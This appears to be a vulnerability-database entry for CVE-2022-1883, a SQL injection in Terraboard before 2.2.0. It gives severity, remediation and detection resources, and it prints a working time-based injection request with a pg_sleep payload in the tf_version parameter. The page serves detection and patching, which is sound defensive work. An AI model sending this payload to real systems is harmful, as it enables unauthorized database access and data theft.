🔙 목록으로 돌아가기

CVE-2022-1883: Terraboard <2.2.0 - SQL Injection

TitleTerraboard <2.2.0 - SQL Injection
Authoredoardottt
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
RemediationUpgrade Terraboard to version 2.2.0 or later to mitigate the SQL Injection vulnerability.
CVSS Score8.8
EPSS Score0.6204
CVE IDCVE-2022-1883
CWE IDCWE-89
Tags time-based-sqli cve cve2022 terraboard sqli huntr camptocamp vkev vuln

🔍 Vulnerability Description

Terraboard prior to 2.2.0 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

GET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(7))+ISNULL-- HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1883.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-1883.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A